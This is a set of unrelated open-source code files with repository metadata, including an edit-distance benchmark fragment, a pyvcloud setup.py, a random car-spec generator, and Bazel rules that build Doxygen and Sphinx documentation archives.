62aaf966c075e395977fecf28d9050755afb7dda | 2,338 | py | Python | algorithms/edit_distance.py | costincaraivan/cs-refresher | 008fdb2af661310c65f656f017ec34e5df004424 | [
"MIT"
] | 1 | 2018-06-12T12:00:33.000Z | 2018-06-12T12:00:33.000Z | algorithms/edit_distance.py | costincaraivan/cs-refresher | 008fdb2af661310c65f656f017ec34e5df004424 | [
"MIT"
] | null | null | null | algorithms/edit_distance.py | costincaraivan/cs-refresher | 008fdb2af661310c65f656f017ec34e5df004424 | [
"MIT"
] | null | null | null | # import unittest
import logging
from timeit import timeit
logging.basicConfig(level=logging.INFO)
# Smoke-check the recursive implementation on a few word pairs.
# NOTE(review): edit_distance_recursive / edit_distance_iterative are defined
# elsewhere in this file — not visible in this excerpt.
logging.info(edit_distance_recursive("intention", "execution"))
logging.info(edit_distance_recursive("jackrabbits", "jackhammer"))
logging.info(edit_distance_recursive("ie", "e"))
# Same inputs through the iterative (dynamic-programming) variant; the two
# sets of results should agree.
logging.info(edit_distance_iterative("intention", "execution"))
logging.info(edit_distance_iterative("jackrabbits", "jackhammer"))
logging.info(edit_distance_iterative("ie", "e"))
# Micro-benchmark: 100 repetitions of the recursive variant via timeit.
logging.info(timeit('edit_distance_recursive("intention", "execution")',
setup='from __main__ import edit_distance_recursive', number=100))
logging.info(timeit('edit_distance_iterative("intention", "execution")',
setup='from __main__ import edit_distance_iterative', number=100)) | 27.505882 | 86 | 0.618477 |
62ab97280947669585b79c2c2795dd161b100377 | 2,365 | py | Python | hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py | Hybrid-Cloud/badam | 390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb | [
"Apache-2.0"
] | 2 | 2015-06-15T02:16:33.000Z | 2022-02-23T07:10:38.000Z | hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py | Hybrid-Cloud/badam | 390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb | [
"Apache-2.0"
] | 7 | 2016-05-13T06:39:45.000Z | 2016-05-20T02:55:31.000Z | hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py | Hybrid-Cloud/badam | 390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb | [
"Apache-2.0"
] | 4 | 2015-11-02T04:02:50.000Z | 2021-05-13T17:06:00.000Z | # VMware vCloud Python SDK
# Copyright (c) 2014 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
import os
def read(fname):
    """Return the text of *fname*, resolved relative to this setup script.

    ``setup()`` below passes ``read('README.rst')`` as the long description;
    without this helper that call raises NameError at packaging time.
    """
    with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), fname)) as f:
        return f.read()


# Runtime dependencies, one requirement specifier per line.
with open('requirements.txt') as f:
    required = f.read().splitlines()

setup(
    name='pyvcloud',
    version='11',
    description='VMware vCloud Python SDK',
    long_description=read('README.rst'),
    url='https://github.com/vmware/pyvcloud',
    author='VMware, Inc.',
    author_email='pgomez@vmware.com',
    packages=find_packages(),
    install_requires=required,
    license='License :: OSI Approved :: Apache Software License',
    classifiers=[
        'Development Status :: 1 - Planning',
        'License :: OSI Approved :: Apache Software License',
        'Intended Audience :: Information Technology',
        'Intended Audience :: System Administrators',
        'Intended Audience :: Developers',
        'Environment :: No Input/Output (Daemon)',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Topic :: System :: Distributed Computing',
        'Operating System :: Microsoft :: Windows',
        'Operating System :: POSIX',
        'Operating System :: Unix',
        'Operating System :: MacOS',
    ],
    keywords='pyvcloud vcloud vcloudair vmware',
    platforms=['Windows', 'Linux', 'Solaris', 'Mac OS-X', 'Unix'],
    test_suite='tests',
    tests_require=[],
    zip_safe=True
)
| 37.539683 | 74 | 0.659197 |
62ac5880cfcb73a7f5f41808ba14ed348ca4e208 | 607 | py | Python | net_utils.py | mfatihaktas/edge-load-balance | b866ca47ba37a605eeba05658b1d302f6855a23f | [
"MIT"
] | null | null | null | net_utils.py | mfatihaktas/edge-load-balance | b866ca47ba37a605eeba05658b1d302f6855a23f | [
"MIT"
] | null | null | null | net_utils.py | mfatihaktas/edge-load-balance | b866ca47ba37a605eeba05658b1d302f6855a23f | [
"MIT"
] | null | null | null | from debug_utils import *
# TODO: does not work
| 24.28 | 95 | 0.634267 |
62ac8d841db4303175fa7656df2488f0b321c7c1 | 2,086 | py | Python | auto.py | fabiaant/Automation-car-generator | aa57f1a69e4c4b1abf123b6bb88863862d43c4eb | [
"MIT"
] | 1 | 2018-10-05T15:12:08.000Z | 2018-10-05T15:12:08.000Z | auto.py | fabiaant/Automation-car-generator | aa57f1a69e4c4b1abf123b6bb88863862d43c4eb | [
"MIT"
] | null | null | null | auto.py | fabiaant/Automation-car-generator | aa57f1a69e4c4b1abf123b6bb88863862d43c4eb | [
"MIT"
] | 1 | 2021-08-30T01:18:36.000Z | 2021-08-30T01:18:36.000Z | import random
# Pools of values a randomly generated car's attributes are drawn from.
options = {
    # Model year range (start/end bounds).
    "year": {
        "start": 1946,
        "end": 2020
    },
    # Body styles.
    "body": ["Sedan", "Wagon", "Hatchback", "Coupe", "SUV", "Utility", "MPV",
             "Convertible", "Van"],
    # Engine placement within the chassis.
    "engine_location": ["front", "mid", "rear"],
    # Engine orientation relative to the direction of travel.
    "engine_mounting": ["transverse", "longitudinal"],
    # Drivetrain layouts.
    "drive": ["FWD", "RWD", "AWD", "4x4"],
    "engine": {
        "aspiration": ["naturally aspirated", "turbocharged"],
        # Each layout maps a name prefix to its possible cylinder counts,
        # e.g. "Inline-" + 4 -> "Inline-4", "60 V" + 8 -> "60 V8".
        "layout": [
            {
                "Inline-": [3, 4, 5, 6]
            },
            {
                "60 V": [6, 8, 12]
            },
            {
                "90 V": [6, 8, 10]
            },
            {
                "Boxer-": [4, 6]
            }
        ]
    }
}
# Generate and describe one random car. NOTE(review): the Car class is
# defined elsewhere in this file; presumably it draws its attributes from
# `options` above — confirm against the class definition.
car = Car()
print("Your next car will be:")
print(car.describe())
input("Press enter to close")
| 27.813333 | 88 | 0.57047 |
62ad2faaa4417f27b1e2dd75edf9e858d937f1c1 | 5,786 | bzl | Python | docs.bzl | es-ude/EmbeddedSystemsBuildScripts | 276c3ca78ba8285cd26c3c10443d89ccc403a69c | [
"MIT"
] | 3 | 2019-06-26T14:08:12.000Z | 2020-03-10T06:24:46.000Z | docs.bzl | es-ude/EmbeddedSystemsBuildScripts | 276c3ca78ba8285cd26c3c10443d89ccc403a69c | [
"MIT"
] | 31 | 2019-06-10T10:50:58.000Z | 2021-08-06T13:43:54.000Z | docs.bzl | es-uni-due/EmbeddedSystemsBuildScripts | 276c3ca78ba8285cd26c3c10443d89ccc403a69c | [
"MIT"
] | 5 | 2019-07-08T23:33:39.000Z | 2020-10-11T20:35:25.000Z | def _doxygen_archive_impl(ctx):
"""Generate a .tar.gz archive containing documentation using Doxygen.
Args:
name: label for the generated rule. The archive will be "%{name}.tar.gz".
doxyfile: configuration file for Doxygen, @@OUTPUT_DIRECTORY@@ will be replaced with the actual output dir
srcs: source files the documentation will be generated from.
"""
doxyfile = ctx.file.doxyfile
out_file = ctx.outputs.out
out_dir_path = out_file.short_path[:-len(".tar.gz")]
commands = [
"mkdir -p %s" % out_dir_path,
"out_dir_path=$(cd %s; pwd)" % out_dir_path,
"pushd %s" % doxyfile.dirname,
"""sed -e \"s:@@OUTPUT_DIRECTORY@@:$out_dir_path/:\" <%s | doxygen -""" % doxyfile.basename,
"popd",
"tar czf %s -C %s ./" % (out_file.path, out_dir_path),
]
ctx.actions.run_shell(
inputs = ctx.files.srcs + [doxyfile],
outputs = [out_file],
use_default_shell_env = True,
command = " && ".join(commands),
)
# Rule: generate Doxygen documentation and package it as <name>.tar.gz.
doxygen_archive = rule(
    implementation = _doxygen_archive_impl,
    attrs = {
        # Doxygen configuration file; its @@OUTPUT_DIRECTORY@@ placeholder is
        # replaced with the real output directory by the implementation.
        "doxyfile": attr.label(
            mandatory = True,
            allow_single_file = True,
        ),
        # Source files the documentation is generated from.
        "srcs": attr.label_list(
            mandatory = True,
            allow_files = True,
        ),
    },
    outputs = {
        "out": "%{name}.tar.gz",
    },
)
def _sphinx_archive_impl(ctx):
    """Generates a sphinx documentation archive (.tar.gz).

    The output is called <name>.tar.gz, where <name> is the name of the rule.

    If ``doxygen_xml_archive`` is set, the archive is unpacked into an
    ``xml/`` directory so the breathe Sphinx plugin can consume it.
    """
    out_file = ctx.outputs.sphinx
    out_dir_path = out_file.short_path[:-len(".tar.gz")]
    commands = ["mkdir _static"]
    # Copy before extending: the list returned by ctx.files is frozen, so
    # appending to it in place fails during the analysis phase.
    inputs = list(ctx.files.srcs)
    if ctx.attr.doxygen_xml_archive != None:
        commands = commands + [
            "mkdir xml",
            "tar -xzf {xml} -C xml --strip-components=2".format(xml = ctx.file.doxygen_xml_archive.path),
        ]
        inputs.append(ctx.file.doxygen_xml_archive)
    commands = commands + [
        # _sphinx_settings(ctx) renders the per-rule configuration passed to
        # sphinx-build; it is defined elsewhere in this file.
        "sphinx-build -M build ./ _build -q -b html -C {settings}".format(
            settings = _sphinx_settings(ctx),
        ),
        "tar czf %s -C _build/build/ ./" % (out_file.path),
    ]
    ctx.actions.run_shell(
        use_default_shell_env = True,
        outputs = [out_file],
        inputs = inputs,
        command = " && ".join(commands),
    )
# Rule: build Sphinx HTML documentation and package it as <name>.tar.gz.
sphinx_archive = rule(
    implementation = _sphinx_archive_impl,
    attrs = {
        # Documentation sources (*.rst by default; see source_suffix).
        "srcs": attr.label_list(
            mandatory = True,
            allow_files = True,
        ),
        # Optional archive of Doxygen XML output, consumed by the breathe
        # Sphinx plugin when set.
        "doxygen_xml_archive": attr.label(
            default = None,
            allow_single_file = True,
        ),
        "master_doc": attr.string(default = "contents"),
        "version": attr.string(
            mandatory = True,
        ),
        "project": attr.string(
            default = "",
        ),
        "copyright": attr.string(default = ""),
        # The attributes below mirror the identically named settings in a
        # Sphinx conf.py.
        "extensions": attr.string_list(default = [
            "sphinx.ext.intersphinx",
            "sphinx.ext.todo",
        ]),
        "templates": attr.string_list(default = []),
        "source_suffix": attr.string_list(default = [".rst"]),
        "exclude_patterns": attr.string_list(default = ["_build", "Thumbs.db", ".DS_Store"]),
        "pygments_style": attr.string(default = ""),
        "language": attr.string(default = ""),
        "html_theme": attr.string(default = "sphinx_rtd_theme"),
        "html_theme_options": attr.string_dict(default = {}),
        "html_static_path": attr.string_list(default = ["_static"]),
        "html_sidebars": attr.string_dict(default = {}),
        "intersphinx_mapping": attr.string_dict(default = {}),
    },
    outputs = {
        "sphinx": "%{name}.tar.gz",
    },
) | 37.816993 | 114 | 0.610093 |
62ae8dd259b43e9f8c27ede31598aad711abeea2 | 234 | py | Python | patches/reduceRNG.py | muffinjets/LADXR | bbd82a5b7bac015561bb6a4cfe1c5fa017f827f5 | [
"MIT"
] | 13 | 2020-09-13T16:50:28.000Z | 2022-03-22T20:49:54.000Z | patches/reduceRNG.py | muffinjets/LADXR | bbd82a5b7bac015561bb6a4cfe1c5fa017f827f5 | [
"MIT"
] | 10 | 2020-06-27T12:34:38.000Z | 2022-01-03T12:15:42.000Z | patches/reduceRNG.py | muffinjets/LADXR | bbd82a5b7bac015561bb6a4cfe1c5fa017f827f5 | [
"MIT"
] | 18 | 2020-05-29T17:48:04.000Z | 2022-02-08T03:36:08.000Z | from assembler import ASM
| 23.4 | 88 | 0.636752 |